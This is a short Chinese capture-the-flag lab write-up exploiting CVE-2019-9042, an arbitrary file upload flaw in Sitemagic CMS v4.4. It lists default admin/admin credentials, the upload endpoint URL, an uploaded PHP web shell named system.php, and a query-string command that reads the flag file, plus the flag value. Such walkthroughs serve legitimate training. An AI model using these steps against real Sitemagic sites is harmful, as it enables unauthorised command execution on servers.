春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)

一、题目

春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)_第1张图片

靶标介绍:

Sitemagic CMS v4.4 index.php?SMExt=SMFiles 存在任意文件上传漏洞,攻击者可上传恶意代码执行系统命令。

 进入题目:

春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)_第2张图片

admin/admin

春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)_第3张图片 

/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages

春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)_第4张图片

 一句话木马:

system.php

春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)_第5张图片 

 /files/images/system.php?1=cat ///flag

春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)_第6张图片

flag{35a77803-ae47-4b5e-a937-d71f263c8a79} 

 

你可能感兴趣的:(i春秋,web安全,安全,网络安全)